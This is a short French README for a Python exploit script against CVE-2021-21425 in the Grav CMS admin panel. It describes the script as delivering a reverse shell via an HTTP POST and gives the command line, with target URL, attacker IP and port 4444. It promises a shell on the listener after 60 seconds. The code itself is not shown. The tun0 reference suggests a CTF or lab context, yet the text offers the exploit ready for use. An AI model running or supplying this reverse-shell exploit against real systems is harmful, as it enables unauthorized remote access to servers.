
Script d'exploitation Python pour CVE-2021-21425 ciblant le panneau d'administration Grav CMS, délivrant un reverse shell via une requête HTTP POST avec LHOST et LPORT configurables.
ceci est ma version, j'en ai trouvé beaucoup sur internet mais celles-ci sont trop mauvaises
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
attendez.. après 60 secondes vous obtiendrez un shell sur votre listener